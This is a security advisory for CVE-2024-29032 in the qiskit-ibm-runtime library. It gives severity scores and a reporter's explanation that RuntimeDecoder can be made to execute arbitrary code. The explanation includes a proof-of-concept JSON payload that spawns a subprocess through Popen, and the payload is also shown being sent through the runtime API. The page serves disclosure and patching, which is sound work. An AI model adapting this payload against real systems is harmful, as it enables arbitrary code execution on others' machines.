5.3 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
8.1 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
15.7%
deserializing json data using qiskit_ibm_runtime.RuntimeDecoder
can be made to execute arbitrary code given a correctly formatted input string
RuntimeDecoder
is supposed to be able to deserialize JSON strings containing various special types encoded via RuntimeEncoder
. However, one can structure a malicious payload to cause the decoder to spawn a subprocess and execute arbitrary code, exploiting this block of code: https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159
malicious_data = {
"__type__": "settings",
"__module__": "subprocess",
"__class__": "Popen",
"__value__": {
"args": ["echo", "hi"]
},
}
json_str = json.dumps(malicious_data)
_ = json.loads(json_str, cls=qiskit_ibm_runtime.RuntimeDecoder) # prints "hi" to the terminal
(where obviously “echo hi” can be replaced with something much more malicious)
notably the following also makes it through the runtime API, with malicious_data
serialized client-side via RuntimeEncoder
(and therefore presumably deserialized server-side via RuntimeDecoder
?)
service = qiskit_ibm_runtime(<ibm_cloud_credentials>)
job = service.run("qasm3-runner", malicious_data)
print(job.status()) # prints "JobStatus.QUEUED"
i don’t know if qiskit_ibm_runtime.RuntimeDecoder
is used server-side so this may or may not be a serious vulnerability on your end (however it’s definitely a security hole for anyone using the library to deserialize third-party data)
CPE | Name | Operator | Version |
---|---|---|---|
qiskit-ibm-runtime | lt | 0.21.2 |
github.com/advisories/GHSA-x4x5-jv3x-9c7m
github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159
github.com/Qiskit/qiskit-ibm-runtime/commit/b78fca114133051805d00043a404b25a33835f4d
github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-x4x5-jv3x-9c7m
nvd.nist.gov/vuln/detail/CVE-2024-29032
5.3 Medium
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
8.1 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
15.7%